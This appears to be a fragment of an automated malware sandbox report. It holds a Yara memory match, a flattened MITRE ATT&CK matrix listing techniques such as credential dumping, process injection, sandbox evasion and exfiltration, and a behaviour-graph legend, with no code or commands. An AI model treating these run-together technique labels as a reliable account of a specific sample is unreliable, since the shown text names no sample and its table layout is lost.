            Source: Yara matchFile source: 00000003.00000003.426167733.0000000005B78000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection1Masquerading11OS Credential DumpingSecurity Software Discovery111Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSSystem Information Discovery115Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet